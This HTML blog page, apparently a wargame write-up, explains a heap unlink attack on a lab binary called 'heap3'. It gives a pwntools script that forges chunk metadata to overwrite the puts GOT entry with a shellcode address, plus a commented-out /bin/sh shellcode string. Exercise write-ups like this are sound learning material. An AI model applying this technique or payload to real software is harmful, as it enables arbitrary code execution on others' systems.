<html>
 <head>
<title> Blog </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

	.top {
	background:
	linear-gradient(45deg, #92baac 45px, transparent 45px)64px 64px,
	linear-gradient(45deg, #92baac 45px, transparent 45px,transparent 91px, #e1ebbd 91px, #e1ebbd 135px, transparent 135px),
	linear-gradient(-45deg, #92baac 23px, transparent 23px, transparent 68px,#92baac 68px,#92baac 113px,transparent 113px,transparent 158px,#92baac 158px);
	background-color:#e1ebbd;
	background-size: 128px 128px;
	width: 100%;
	height:40%; 
	}
      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div class = "top">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Blog </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Unlink exploit </h1>
   
 <br> 

<p>
We have to overflow the heap_b and overwrite heap_c chunk metadata <br> <br> 
1) set prev_size to -8 (so that prev chunk  size field points to heap_b prev size itself)<br><br> 
2) set size to -80 (so that next chunk points to heap_a ) <br><br> 
3) now when  free(heap_c) is called first it checks whether prev_chunk is free in this case yeah so it tries unlink by making mchunkptr -= prev_size <br>  
which actually becomes mchunkptr+8 = fd&bk ptr of heap_c itself ...
</p>

<code>
from pwn import *

fake_chunk_size = -4
fake_chunk_prev_size = -4
chunk3_size = -80
chunk3_prev_size = -8 
winner_addr = 0x8048864
shellcode = asm(shellcraft.i386.push(winner_addr)+shellcraft.i386.ret())
print repr(shellcode)
#shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80"
shellcode_addr = 0x804c030
puts_addr =  0x0804b128 
saved_eip = 0xffffcd8c
fd = puts_addr-12
bk = shellcode_addr


arg1 = "A"*32
arg2 = "\xeb\x0a"+"\x90"*(32-len(shellcode)-2)+shellcode+pack(chunk3_prev_size)+pack(chunk3_size)
arg3 = pack(fake_chunk_prev_size)+pack(fake_chunk_size)+pack(fd)+pack(bk)
p = process(['./heap3',arg1,arg2,arg3])

print p.recvline()

</code>


</body>
</html>
